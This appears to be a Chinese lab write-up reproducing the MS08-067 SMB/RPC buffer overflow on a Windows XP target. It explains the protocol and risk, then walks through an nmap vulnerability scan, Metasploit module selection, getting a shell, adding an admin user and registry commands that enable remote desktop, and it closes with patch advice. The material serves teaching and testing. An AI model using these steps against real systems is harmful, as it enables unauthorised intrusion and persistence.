MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现
1. 概述
1.1 SMB
What is SMB?
SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口,SMB使用了NetBIOS的API。
SMB工作原理是什么?
首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。
协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。
当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。
连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。
1.2 漏洞简述
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。
1.3 风险等级
评定方式 | 等级 |
---|---|
CVSS Score | 10.0 |
Confidentiality Impact | Complete |
Integrity Impact | Complete |
Availability Impact | Complete |
实现难度 | 低 |
基础权限 | 不需要 |
漏洞类型 | 代码执行+缓存区溢出 |
1.4 影响范围
Windows 2000 SP4
Windows Server 2003 SP1-2
Windows Server 2008
Windows Vista SP0-1
Windows XP SP1-3
1.5 漏洞详情/原理
MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误(溢出),造成可被利用实施远程代码执行(Remote Code Execution)。后续部分我将分析该漏洞的CFG流程图及漏洞成因。
2. 环境配置
主机 | 系统 | IP |
---|---|---|
靶机 | Windows XP | 192.168.189.129 |
攻击机 | Kaili | 192.168.189.128 |
注:在配置靶机Windows XP或其他受影响的版本时需要打开TCP默认445端口
访问测试
3. 漏洞复现
-
Nmap扫描,发现端口及服务漏洞
nmap -Pn -sV --script=vuln -oN nmap.out victim_ip
发现445端口开放,及两个漏洞,编号如图
-
打开Matespioit,搜索相应漏洞利用模块,并选用
search ms08-067
use 0
-
设置相应参数,并选着目标所用系统版本
检查有无遗漏
运行模块
成功利用
-
提权
进入Shell
可能会遇到乱码问题,是选用了中文版XP系统所致,这里换成了英文版就没有乱码了,或者通过
chcp 65001
解决创建高权限用户
这里也可以打开默认端口3389进行远程桌面连接
方法如下远程桌面默认端口3389,CMD命令如下
打开:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
4. 修复建议
- 升级到最新的Windows系统,安装KB958644补丁
- 修改远程桌面默认端口,或关闭该服务
- …
5. 总结
6. 漏洞成因
等我学会了再写吧…
可以先参考如下文章文章来源:https://www.toymoban.com/news/detail-476427.html
- MS08-067复现与简单分析
- 漏洞考古:MS08-067详细分析
7. References
CVE Details (2020) CVE-2008-4250. Available at: https://www.cvedetails.com/cve/CVE-2008-4250/…(Accessed: 30 Aug 2022).文章来源地址https://www.toymoban.com/news/detail-476427.html
到了这里,关于MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!